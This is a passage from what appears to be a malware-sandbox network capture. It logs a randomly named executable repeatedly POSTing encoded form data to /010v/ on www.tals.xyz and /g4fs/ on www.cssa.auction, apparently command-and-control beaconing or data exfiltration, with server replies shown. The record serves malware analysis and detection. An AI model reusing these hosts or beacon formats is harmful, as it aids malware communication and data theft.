                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.tals.xyz
                                                                  Origin: http://www.tals.xyz
                                                                  Referer: http://www.tals.xyz/010v/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 37 42 38 57 6c 42 70 66 6f 47 6a 47 58 72 34 64 47 75 42 58 33 42 4c 6f 2b 65 66 73 33 4f 53 72 44 73 71 2b 58 2f 52 6b 46 7a 4f 68 65 76 6b 31 41 78 73 44 35 56 6b 32 66 33 55 57 31 78 4f 66 4f 6e 4e 38 4b 75 37 67 72 4e 4a 2f 42 45 43 74 49 73 2f 59 33 70 34 45 7a 6a 45 50 52 42 78 42 67 6b 67 70 45 4a 75 76 32 75 4b 33 59 59 50 4a 4e 4f 43 37 2b 69 73 65 58 33 4e 61 71 78 75 4f 6f 6c 4c 72 48 54 31 39 6a 75 33 5a 6a 2b 44 55 55 74 7a 68 47 49 2b 6d 43 72 79 65 50 77 67 70 49 71 36 7a 65 57 4e 6b 66 53 78 72 59 31 69 50 35 76 51 35 61 34 47 46 69 4a 73 38 2f 70 57 49 2b 64 53 77 69 54 41 6c 4a 54 6f 6f 32 50 31 6b 5a 77 3d 3d
                                                                  Data Ascii: 0PIXBf9=7B8WlBpfoGjGXr4dGuBX3BLo+efs3OSrDsq+X/RkFzOhevk1AxsD5Vk2f3UW1xOfOnN8Ku7grNJ/BECtIs/Y3p4EzjEPRBxBgkgpEJuv2uK3YYPJNOC7+iseX3NaqxuOolLrHT19ju3Zj+DUUtzhGI+mCryePwgpIq6zeWNkfSxrY1iP5vQ5a4GFiJs8/pWI+dSwiTAlJToo2P1kZw==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.75315813.248.169.48803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:39.274394989 CET812OUTPOST /010v/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.tals.xyz
                                                                  Origin: http://www.tals.xyz
                                                                  Referer: http://www.tals.xyz/010v/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 37 42 38 57 6c 42 70 66 6f 47 6a 47 58 4c 49 64 64 4e 5a 58 2f 42 4c 33 78 2b 66 73 34 75 53 52 44 73 6d 2b 58 2b 55 68 47 42 61 68 5a 4e 73 31 42 31 77 44 36 56 6b 32 58 58 55 54 34 52 4f 45 4f 6e 51 44 4b 76 58 67 72 4e 64 2f 42 46 79 74 50 66 58 62 32 35 34 47 79 54 45 4e 63 68 78 42 67 6b 67 70 45 4a 72 41 32 75 53 33 62 70 66 4a 50 71 57 34 7a 43 73 64 42 6e 4e 61 38 42 75 4b 6f 6c 4c 4a 48 57 4a 62 6a 72 37 5a 6a 36 48 55 55 63 7a 69 64 34 2b 67 4d 4c 7a 2b 4c 67 4d 6d 46 37 76 4d 45 57 64 68 57 77 5a 55 51 6a 6a 74 6a 4e 63 56 45 70 2b 2b 6d 4c 49 4b 6f 50 4c 39 38 63 57 6f 76 78 30 45 57 6b 4e 43 37 64 55 67 50 4d 6f 52 4d 41 71 57 72 39 4e 67 6d 4b 72 38 61 67 5a 39 6f 77 67 3d
                                                                  Data Ascii: 0PIXBf9=7B8WlBpfoGjGXLIddNZX/BL3x+fs4uSRDsm+X+UhGBahZNs1B1wD6Vk2XXUT4ROEOnQDKvXgrNd/BFytPfXb254GyTENchxBgkgpEJrA2uS3bpfJPqW4zCsdBnNa8BuKolLJHWJbjr7Zj6HUUczid4+gMLz+LgMmF7vMEWdhWwZUQjjtjNcVEp++mLIKoPL98cWovx0EWkNC7dUgPMoRMAqWr9NgmKr8agZ9owg=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.75315913.248.169.48803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:41.823069096 CET1825OUTPOST /010v/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.tals.xyz
                                                                  Origin: http://www.tals.xyz
                                                                  Referer: http://www.tals.xyz/010v/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 37 42 38 57 6c 42 70 66 6f 47 6a 47 58 4c 49 64 64 4e 5a 58 2f 42 4c 33 78 2b 66 73 34 75 53 52 44 73 6d 2b 58 2b 55 68 47 42 43 68 5a 34 34 31 42 53 45 44 37 56 6b 32 5a 33 55 53 34 52 50 63 4f 6e 49 48 4b 76 4b 56 72 50 6c 2f 41 6e 36 74 4b 75 58 62 38 35 34 47 33 6a 45 41 52 42 77 56 67 6b 51 79 45 4a 37 41 32 75 53 33 62 71 58 4a 47 65 43 34 78 43 73 65 58 33 4d 56 71 78 75 79 6f 6c 44 7a 48 58 59 67 6a 59 7a 5a 6a 65 6a 55 48 2b 72 69 41 49 2b 59 42 72 7a 63 4c 67 42 6d 46 2f 47 2f 45 58 5a 4c 57 7a 35 55 42 79 58 37 6d 76 4d 61 65 70 65 61 74 62 59 42 39 64 58 30 2f 4b 57 32 6e 77 6c 6d 54 33 52 66 33 4d 4d 61 43 38 78 4a 51 51 4f 39 77 66 78 6b 6a 4e 75 49 42 7a 4e 73 31 31 4b 57 6f 58 6a 56 76 35 66 55 4f 6a 38 79 4b 43 59 4d 32 57 51 6b 33 34 59 4f 77 37 58 45 5a 33 72 53 56 4a 76 77 49 6b 2f 4a 31 49 77 4e 6e 50 57 45 4e 6e 6a 51 49 76 68 41 43 52 43 65 49 4a 47 34 6e 56 52 36 2f 61 38 7a 76 4d 49 35 4f 31 50 57 4a 39 67 67 41 41 6f 46 58 6e 2f 67 77 79 47 50 76 76 [TRUNCATED]
                                                                  Data Ascii: 0PIXBf9=7B8WlBpfoGjGXLIddNZX/BL3x+fs4uSRDsm+X+UhGBChZ441BSED7Vk2Z3US4RPcOnIHKvKVrPl/An6tKuXb854G3jEARBwVgkQyEJ7A2uS3bqXJGeC4xCseX3MVqxuyolDzHXYgjYzZjejUH+riAI+YBrzcLgBmF/G/EXZLWz5UByX7mvMaepeatbYB9dX0/KW2nwlmT3Rf3MMaC8xJQQO9wfxkjNuIBzNs11KWoXjVv5fUOj8yKCYM2WQk34YOw7XEZ3rSVJvwIk/J1IwNnPWENnjQIvhACRCeIJG4nVR6/a8zvMI5O1PWJ9ggAAoFXn/gwyGPvvGmdFuoxD1vqtgX/hmdxOaf3uW0rYuIFmJJwteDetKyKgWCd9CjDbHvsAz04yehOa4MBvxi4blkkoGQ82rKzLxnGBpe9p6sPL84QvjjK4U73EYWhKyHlxZ6NynsTwwsjznzldG7mfSK8ogod2I30i3U1kPy/hfIVtzF8gWi8cPravNQn1oLOxz+DBfjJiW3tFjNqcjhnPx1cUyAMj+43MHTBFLGfAwD6yRpii6ajortr5zv4rUO2s0iVrGijF2IGZQ3jbHIEavJMTaxgfKslUEw7ZnCrRuzcq1nXOtUliSjzDprsuT4GKzGFEQP6vevqRRcFYVI3BrDzr8nJe7Hmt8YvttdZkQ1bh6eu7zdov2Bukg9A3BFG193XDJp2BCBwzBqwNWC8b3ZqhzYh5Glk1HnL4spOW1xNU3G6hOPDJ2i3eTms+FzrICfve050wrsQMdMGE+zeeeBbYF42dGHtK/kYC236hohw1Nb4O92H/2w8C3fodKNNzRQUPBM4KYDf4PdjmztRJPRG68bWDNb/Qhe1zaS722SqgFPb9dLTlcEqeyWuSmshIOz4NUW9l6AWiFAgrGAC+Ve82PX1hE2lrV8lHNe1vnevt8knyD+JlKd9Fq0JzQUTqrvsYv1PlMSYTfY4dezgI3qsbmCe9Ia7eSICdiHhn+KrRaS [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.75316013.248.169.48803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:44.361424923 CET537OUTGET /010v/?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.tals.xyz
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:13:45.021100998 CET416INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Mon, 18 Nov 2024 12:13:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 276
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 50 49 58 42 66 39 3d 32 44 55 32 6d 30 68 6a 2f 30 33 79 54 36 34 5a 41 76 56 33 34 69 76 67 37 75 50 41 34 64 66 42 44 73 53 49 62 75 51 6d 46 42 6e 6c 55 74 38 59 42 51 51 31 34 58 45 6e 42 30 30 71 33 69 79 4f 53 44 46 33 50 2b 6e 4d 75 71 56 64 57 48 2b 64 4f 76 32 6d 79 4b 34 37 2b 77 41 6e 62 7a 45 64 72 44 46 4b 4d 34 47 6e 71 4c 75 34 65 4a 33 36 54 59 4f 31 72 47 31 45 41 56 6f 75 6f 6d 6d 61 68 6a 48 58 55 52 39 70 6d 65 76 5a 26 74 44 5f 3d 66 30 30 78 55 56 4b 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh"}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.753161107.167.84.42803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:50.572206020 CET804OUTPOST /g4fs/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.cssa.auction
                                                                  Origin: http://www.cssa.auction
                                                                  Referer: http://www.cssa.auction/g4fs/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 36 6c 31 6f 5a 79 57 30 5a 63 30 6c 76 6d 79 65 30 6a 58 4e 5a 6b 46 31 4a 46 50 31 6b 54 30 36 37 53 55 5a 4c 50 61 72 36 51 77 66 66 34 38 2b 31 69 58 4c 53 2f 6c 77 6e 68 41 39 34 58 71 6a 71 4f 67 39 7a 79 32 35 32 6c 4e 47 2f 2b 6d 43 69 48 78 65 4b 70 47 76 35 43 48 70 67 67 6b 34 58 30 6d 34 71 57 48 45 64 30 47 5a 30 55 4e 35 6a 50 64 37 74 42 46 55 59 56 6c 56 34 33 48 5a 66 52 54 2f 38 47 6e 57 35 45 72 6a 49 69 7a 49 35 46 47 79 6c 65 6a 76 66 59 52 59 76 48 74 6c 77 4f 4e 74 68 66 7a 6d 35 47 55 6e 62 50 30 79 5a 46 71 4b 6e 42 71 6a 67 64 38 64 59 77 71 31 53 50 4c 38 77 5a 2f 53 33 7a 65 56 46 4d 62 42 41 67 3d 3d
                                                                  Data Ascii: 0PIXBf9=6l1oZyW0Zc0lvmye0jXNZkF1JFP1kT067SUZLPar6Qwff48+1iXLS/lwnhA94XqjqOg9zy252lNG/+mCiHxeKpGv5CHpggk4X0m4qWHEd0GZ0UN5jPd7tBFUYVlV43HZfRT/8GnW5ErjIizI5FGylejvfYRYvHtlwONthfzm5GUnbP0yZFqKnBqjgd8dYwq1SPL8wZ/S3zeVFMbBAg==
                                                                  Nov 18, 2024 13:13:51.201149940 CET1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 18 Nov 2024 12:13:51 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                  Nov 18, 2024 13:13:51.201195002 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                  Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.753162107.167.84.42803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:53.134028912 CET824OUTPOST /g4fs/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.cssa.auction
                                                                  Origin: http://www.cssa.auction
                                                                  Referer: http://www.cssa.auction/g4fs/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 36 6c 31 6f 5a 79 57 30 5a 63 30 6c 74 47 69 65 34 68 2f 4e 52 6b 46 32 4d 46 50 31 76 7a 30 6d 37 53 6f 5a 4c 4d 57 37 35 69 55 66 66 61 6b 2b 6b 58 6a 4c 56 2f 6c 77 74 42 42 31 6c 48 71 65 71 4f 73 31 7a 32 32 35 32 6b 70 47 2f 38 2b 43 2b 6b 70 64 4c 35 47 74 32 69 48 72 6b 67 6b 34 58 30 6d 34 71 53 76 69 64 30 75 5a 31 6b 64 35 6c 75 64 34 6e 68 46 58 66 56 6c 56 38 33 48 64 66 52 53 51 38 48 72 38 35 43 6e 6a 49 67 72 49 34 55 47 78 2b 75 6a 6c 41 49 51 56 67 79 41 66 36 4f 63 66 72 4f 48 77 78 6c 59 47 61 35 31 51 44 6e 6d 6d 35 51 53 59 6b 66 59 72 50 57 33 41 51 4f 50 6b 39 37 4c 7a 6f 45 37 2f 49 65 36 46 57 57 48 54 51 6c 4a 6a 71 70 4f 2f 47 53 42 4b 41 59 68 54 68 72 4d 3d
                                                                  Data Ascii: 0PIXBf9=6l1oZyW0Zc0ltGie4h/NRkF2MFP1vz0m7SoZLMW75iUffak+kXjLV/lwtBB1lHqeqOs1z2252kpG/8+C+kpdL5Gt2iHrkgk4X0m4qSvid0uZ1kd5lud4nhFXfVlV83HdfRSQ8Hr85CnjIgrI4UGx+ujlAIQVgyAf6OcfrOHwxlYGa51QDnmm5QSYkfYrPW3AQOPk97LzoE7/Ie6FWWHTQlJjqpO/GSBKAYhThrM=
                                                                  Nov 18, 2024 13:13:53.754245996 CET1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 18 Nov 2024 12:13:53 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                  Nov 18, 2024 13:13:53.754277945 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                  Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.753163107.167.84.42803736C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:13:55.919303894 CET1837OUTPOST /g4fs/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.cssa.auction
                                                                  Origin: http://www.cssa.auction
                                                                  Referer: http://www.cssa.auction/g4fs/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 36 6c 31 6f 5a 79 57 30 5a 63 30 6c 74 47 69 65 34 68 2f 4e 52 6b 46 32 4d 46 50 31 76 7a 30 6d 37 53 6f 5a 4c 4d 57 37 35 69 63 66 63 70 73 2b 32 41 2f 4c 55 2f 6c 77 72 78 42 30 6c 48 71 35 71 4e 63 50 7a 32 37 4d 32 6e 42 47 2f 5a 71 43 75 52 64 64 42 35 47 74 30 69 48 6d 67 67 6b 70 58 30 32 30 71 57 4c 69 64 30 75 5a 31 68 5a 35 79 76 64 34 68 68 46 55 59 56 6c 52 34 33 48 31 66 52 4b 71 38 48 76 47 35 79 48 6a 49 41 37 49 31 47 75 78 79 75 6a 6a 44 49 52 47 67 79 45 36 36 4f 52 6d 72 4f 44 65 78 6e 49 47 61 66 41 4a 53 30 71 75 6f 69 61 31 71 76 6b 4d 4f 58 79 39 63 65 50 62 30 70 54 6e 72 6c 58 63 51 49 4c 50 58 54 47 77 4e 58 46 33 68 4c 43 7a 57 69 55 67 46 6f 78 49 38 4c 77 39 4a 79 38 51 4e 49 5a 78 33 36 53 42 36 51 52 46 58 69 41 53 43 45 57 63 4f 47 56 65 65 62 54 53 47 44 44 4b 74 67 4e 67 33 6a 5a 4a 36 4d 4f 43 39 77 63 4e 55 45 71 68 59 70 4b 41 6c 71 4c 68 7a 35 78 69 41 4a 37 37 34 72 75 42 64 39 41 71 33 44 47 6d 6d 46 68 4f 75 53 5a 5a 36 71 6d 51 62 36 [TRUNCATED]
                                                                  Data Ascii: 0PIXBf9=6l1oZyW0Zc0ltGie4h/NRkF2MFP1vz0m7SoZLMW75icfcps+2A/LU/lwrxB0lHq5qNcPz27M2nBG/ZqCuRddB5Gt0iHmggkpX020qWLid0uZ1hZ5yvd4hhFUYVlR43H1fRKq8HvG5yHjIA7I1GuxyujjDIRGgyE66ORmrODexnIGafAJS0quoia1qvkMOXy9cePb0pTnrlXcQILPXTGwNXF3hLCzWiUgFoxI8Lw9Jy8QNIZx36SB6QRFXiASCEWcOGVeebTSGDDKtgNg3jZJ6MOC9wcNUEqhYpKAlqLhz5xiAJ774ruBd9Aq3DGmmFhOuSZZ6qmQb6+M27r4WGi2mNw9/tWQV4X9dJJ5P871Guax7sDl2pQtds2GsTPHO+F78Y4ITlwnqx1nQ5gq3NQEgZ29gJHW9O4oABAab95cZR4UAA9pVMYEgEI4ekYFx0MuG0jQUQO3bpcbpfMv2yqyk+Rg3XIZNxvMpRNi8M4vby/BR5ZmeJYokyBuBcvArHuVWcqXt3caz6fV9GtSHO3jDqMoiyN3aic6GhYFIhXvzPkfQmUyWrPgR6sPMfNy0Jz2pbe+Aum0eRXS3NKa6q9FA+Apa++hU0yhlgTxvZBcHBeHd0bAedCH5HEVbmAF9xghveeTp9+oP73ApDqiONT6zrXEkEzZFQ2sfRcF5kJpKuOAPIYG9nTfn+SXB79qSKvl1kqoVYYHSYinzYoH8391tRg27MzXTVLbmzpKdX3sYRmflJU1tEdr5mLahlk3FH3aPclPRvfYbCarYwhlrfvS5vQgjTkA+r6n0cZY5ov7K5yQvIy9UHZzL9UedNgT9rtm8dD8sPgl52+fS/Oi72ve6Qmhn5T5A8CJCGKJzbYKGSeOMxbtxRaW4gA14XzwAHAbNwXsoVV9n5pklHoXMe4FoVusQjfkmij7d5RwaKBH534QJ+MQkDei7C359MZ2yyYYGidicYKi4bADfMY4v6cHOGA/5vt/aWcAl60BKjmZxSe/ [TRUNCATED]
                                                                  Nov 18, 2024 13:13:56.424360991 CET1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 18 Nov 2024 12:13:56 GMT
